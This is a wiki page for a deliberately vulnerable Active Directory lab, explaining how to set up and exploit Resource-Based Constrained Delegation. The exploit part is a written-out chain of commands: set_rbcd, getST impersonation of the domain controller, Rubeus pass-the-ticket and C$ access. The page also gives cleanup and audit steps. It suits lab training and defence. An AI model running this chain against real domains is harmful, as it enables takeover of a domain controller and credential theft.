Resource‐Based Constrained Delegation - benlee105/DeliberateVulnADConfig GitHub Wiki

Preparing for RBCD

Step 0: Preparing Attacker tools

Step 1: Create a computer account

As a domain admin, on a host with the RSAT ActiveDirectory module, create a computer account with the PowerShell command below (replace the DC= components with your actual domain). Check the -Path as well: the default container for computers is CN=Computers,DC=<DOMAINNAME>,DC=com, so OU=Computers only resolves if your lab has an OU of that name.

New-ADComputer -Name "RBCDCOMPUTER" -SamAccountName "RBCDCOMPUTER$" -AccountPassword (ConvertTo-SecureString "P@ssw0rdP@ssw0rd" -AsPlainText -Force) -Enabled $true -Path "OU=Computers,DC=<DOMAINNAME>,DC=com"

Step 2: Grant the computer account rights on the domain controller's computer object

In Active Directory Users and Computers (with View > Advanced Features enabled, otherwise the Security tab is hidden), right click your domain controller's computer object > Properties

Navigate to the Security tab > click Add > add your newly created computer account > click Advanced > select your newly created computer account > click Edit

You can now choose between granting only the specific rights RBCD requires, GenericWrite, or GenericAll. Write access to msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer object is the right that matters for the attack; GenericWrite and GenericAll are broader grants that include it.

Choice 1: Grant specific rights required for RBCD

  • Tick Read msDS-AllowedToActOnBehalfOfOtherIdentity
  • Tick Write msDS-AllowedToActOnBehalfOfOtherIdentity

Choice 2: Grant GenericWrite

  • Tick Write all properties

Choice 3: Grant GenericAll

  • Tick Full control

Then click OK for everything.
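The same two preparation steps done from PowerShell rather than the ADUC GUI, as an added example that is not part of the original wiki. It assumes an elevated session with the RSAT ActiveDirectory module, creates the account in the default Computers container, and uses a $choice variable (1, 2 or 3, matching the three choices above) to decide which ACE to add; the domain and the domain controller are discovered from the session rather than hard-coded.

```powershell
# Added example, not part of the original wiki: Steps 1 and 2 from an elevated
# PowerShell session with the RSAT ActiveDirectory module instead of the ADUC GUI.
# Account name, password and $choice are assumptions; domain and DC come from the session.
Import-Module ActiveDirectory

$computerName = "RBCDCOMPUTER"
$password     = ConvertTo-SecureString "P@ssw0rdP@ssw0rd" -AsPlainText -Force
$choice       = 1   # 1 = attribute-specific Read/Write, 2 = GenericWrite, 3 = GenericAll

# Step 1: attacker-controlled computer account in the default Computers container
# (pass -Path "OU=<your OU>,$domainDN" instead if your lab uses a dedicated OU)
$domainDN = (Get-ADDomain).DistinguishedName
New-ADComputer -Name $computerName -SamAccountName "$computerName`$" `
    -AccountPassword $password -Enabled $true -Path "CN=Computers,$domainDN"
$granteeSid = (Get-ADComputer -Identity "$computerName`$").SID

# Step 2: the ACE goes on the domain controller's computer object
$dcDN    = (Get-ADDomainController).ComputerObjectDN
$aclPath = "AD:\$dcDN"

# schemaIDGUID of msDS-AllowedToActOnBehalfOfOtherIdentity, so choice 1 is scoped
# to that single attribute rather than to all properties
$schemaNC = (Get-ADRootDSE).schemaNamingContext
$attr = Get-ADObject -SearchBase $schemaNC -Properties schemaIDGUID `
    -LDAPFilter "(lDAPDisplayName=msDS-AllowedToActOnBehalfOfOtherIdentity)"
$attrGuid = [guid]$attr.schemaIDGUID

switch ($choice) {
    1 { $rights = [System.DirectoryServices.ActiveDirectoryRights]"ReadProperty, WriteProperty"; $objectType = $attrGuid }
    2 { $rights = [System.DirectoryServices.ActiveDirectoryRights]::GenericWrite; $objectType = [guid]::Empty }
    3 { $rights = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll;   $objectType = [guid]::Empty }
}

# An empty ObjectType GUID means the ACE applies to the whole object (choices 2 and 3)
$ace = [System.DirectoryServices.ActiveDirectoryAccessRule]::new(
    $granteeSid, $rights, [System.Security.AccessControl.AccessControlType]::Allow, $objectType)

$acl = Get-Acl -Path $aclPath
$acl.AddAccessRule($ace)
Set-Acl -Path $aclPath -AclObject $acl

# Check: the new entry should now be listed on the DC object
(Get-Acl -Path $aclPath).Access |
    Where-Object { $_.IdentityReference -like "*\$computerName`$" } |
    Format-Table IdentityReference, ActiveDirectoryRights, ObjectType -AutoSize
```

The final Get-Acl is the check worth keeping: for choice 1 the ObjectType column should show the GUID of msDS-AllowedToActOnBehalfOfOtherIdentity, for choices 2 and 3 an all-zero GUID, which is what tells you the grant is broader than RBCD alone.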

Attacking via Exploiting RBCD

Step 1

Get a C2 agent running on a domain-joined machine and start a SOCKS proxy on it, so the impacket tooling run from the attacker's Linux box in the following steps can reach the domain controller over LDAP and Kerberos.

Step 2

Edit /etc/proxychains.conf so the entry in the [ProxyList] section at the bottom of the file points to your SOCKS proxy
sudo nano /etc/proxychains.conf

Step 3

Connect with ldap_shell (the standalone tool built on impacket's ntlmrelayx LDAP shell) as the new computer account, then set RBCD on the domain controller. set_rbcd takes the target object first and the account being allowed to delegate to it second:
proxychains4 ldap_shell <domain>/<newComputerAccount$>
set_rbcd <domainController$> <newComputerAccount$>

Step 4

Exit ldap_shell and use impacket's getST.py to request a service ticket for the domain controller's LDAP service while impersonating the domain controller's own machine account (S4U2self followed by S4U2proxy). Mind the quoting: the computer account name includes its trailing $, and each quoted argument is closed before the next flag. getST saves the ticket in the current directory as <impersonated>@<SPN with / replaced by _>@<domain>.ccache.
proxychains4 python3 getST.py -dc-ip <domainController IP> '<domain>/<newComputerAccount$>':'<password>' -spn 'LDAP/<domainController.domain.name>' -impersonate '<domainController$>'

Step 5

Set the environment variable KRB5CCNAME to point the impacket scripts at the saved ccache file.
You MUST put \ before the $ in the ccache file name (or single-quote the whole path). The name starts with <domainController$>@, and to bash an unquoted $@ is the positional-parameter list, which is empty at an interactive prompt, so the characters are silently dropped and the file is not found.
export KRB5CCNAME=/home/kali/impacket/examples/<ccache file name>

Step 6

With the returned hash you can now request a TGT and pass the ticket using Rubeus. That hash is typically obtained by DCSyncing with the LDAP ticket from Step 4 (for example impacket's secretsdump.py with -k -no-pass against the domain controller); that step is not shown on this page. The value given to /aes256 is the domain admin's AES256 Kerberos key.
execute-assembly exe/Rubeus.exe asktgt /user:<domain admin> /domain:<domain> /aes256:<aes256 hash> /ptt

Step 7

Verify that you can now access the domain controller's filesystem from the beacon; with a domain admin's TGT injected into the session this should succeed.
ls \\<domainController>\C$

Cleanup

Clear msDS-AllowedToActOnBehalfOfOtherIdentity by logging in with ldap_shell as the newly created computer account and running clear_rbcd against the domain controller. To return the lab to its starting state, also remove the ACE added in Step 2 and delete the computer account.
proxychains4 ldap_shell <domain>/<newComputerAccount$>
clear_rbcd <domainController$>
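A defender-side audit and a full cleanup from PowerShell, added here as an example that is not part of the original wiki: it lists every computer with an RBCD entry, clears the attribute on the domain controller (the same effect as clear_rbcd, done from the DC side), removes the ACE from Step 2 and deletes the computer account. The account name is the one assumed in Step 1; the domain controller is discovered from the session.

```powershell
# Added example, not part of the original wiki: audit every RBCD entry in the
# domain, then undo Steps 1 and 2 from an elevated PowerShell session.
# The computer account name is an assumption; adjust it to your lab.
Import-Module ActiveDirectory

$computerName = "RBCDCOMPUTER"
$dcDN         = (Get-ADDomainController).ComputerObjectDN

# Audit: any computer whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated.
# A clean lab returns nothing; a domain controller in this list is a red flag.
Get-ADComputer -LDAPFilter "(msDS-AllowedToActOnBehalfOfOtherIdentity=*)" `
    -Properties PrincipalsAllowedToDelegateToAccount |
    Select-Object Name, @{ n = "AllowedToActOnBehalf"; e = { $_.PrincipalsAllowedToDelegateToAccount -join "; " } }

# Cleanup 1: clear the attribute on the DC (what clear_rbcd does, done as a domain admin)
Set-ADComputer -Identity $dcDN -PrincipalsAllowedToDelegateToAccount $null

# Cleanup 2: remove the ACE granted in Step 2. Inherited entries are skipped
# because RemoveAccessRule cannot remove them; ours is explicit.
$aclPath = "AD:\$dcDN"
$acl = Get-Acl -Path $aclPath
$acl.Access |
    Where-Object { -not $_.IsInherited -and $_.IdentityReference -like "*\$computerName`$" } |
    ForEach-Object { [void]$acl.RemoveAccessRule($_) }
Set-Acl -Path $aclPath -AclObject $acl

# Cleanup 3: delete the attacker-controlled computer account
Remove-ADComputer -Identity "$computerName`$" -Confirm:$false

# Check: the audit query and the ACE lookup should both come back empty now
Get-ADComputer -LDAPFilter "(msDS-AllowedToActOnBehalfOfOtherIdentity=*)" | Select-Object Name
(Get-Acl -Path $aclPath).Access | Where-Object { $_.IdentityReference -like "*\$computerName`$" }
```

The audit query is the part worth scheduling outside the lab: with "Audit Directory Service Changes" enabled and a write SACL on the DC computer object, the set_rbcd write in Step 3 also shows up as Security event 5136 naming the modified attribute.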

Troubleshooting

If Kali reports that it cannot find the ccache file, LOOK AT YOUR EXPORT COMMAND.

You need to put a \ before the $ in your .ccache file name, or single-quote the whole path; otherwise bash expands the $@ in the name to nothing and the resulting path does not exist.
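Why the $ matters, as an added example that is not from the original wiki and covers both Step 5 and this troubleshooting note: a small bash script that reproduces the unquoted expansion that loses the characters, and a helper that exports KRB5CCNAME safely and checks the file exists first. The ticket name DC01$@LDAP_dc01.lab.local@LAB.LOCAL.ccache and the lab domain are constructed for the demonstration; an empty file stands in for the real ticket.

```bash
#!/usr/bin/env bash
# Added example, not from the original wiki: why the unescaped "$" in the ccache
# file name breaks KRB5CCNAME (Step 5 / Troubleshooting) and a helper that sets
# it safely. The file and principal names below are constructed for illustration.

# getST.py saves the ticket as <impersonated>@<SPN with / as _>@<domain>.ccache,
# so with -impersonate 'DC01$' the name begins with "DC01$@". Typed unquoted
# after "export KRB5CCNAME=", the "$@" is the shell's positional-parameter list,
# which is empty at an interactive prompt, so those two characters vanish.
expand_unquoted() {
    local raw=$1
    set --                        # an interactive shell has no positional parameters
    eval "printf '%s' $raw"       # the same expansion the shell applies to an unquoted export value
}

# Safe form: hand the path over as one quoted word (equivalent to escaping the $
# with a backslash, as the wiki does) and confirm the file is really there.
set_krb5ccname() {
    local ccache=$1
    if [ ! -f "$ccache" ]; then
        printf 'ccache not found: %s\n' "$ccache" >&2
        return 1
    fi
    export KRB5CCNAME="$ccache"
    printf '%s' "$KRB5CCNAME"
}

# Demonstration on a constructed ticket name (an empty file stands in for the ticket)
workdir=$(mktemp -d)
ticket="$workdir/DC01\$@LDAP_dc01.lab.local@LAB.LOCAL.ccache"
: > "$ticket"
printf 'unquoted: %s\n' "$(expand_unquoted "$ticket")"   # DC01LDAP_dc01... : the $@ is gone
printf 'quoted:   %s\n' "$(set_krb5ccname "$ticket")"    # path intact, file found
rm -r "$workdir"
```

Run it with bash; the first line printed is the mangled path that impacket would then fail to open, the second is the intact one. Calling set_krb5ccname before every impacket invocation also catches the other common mistake, running getST in one directory and exporting a path in another.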
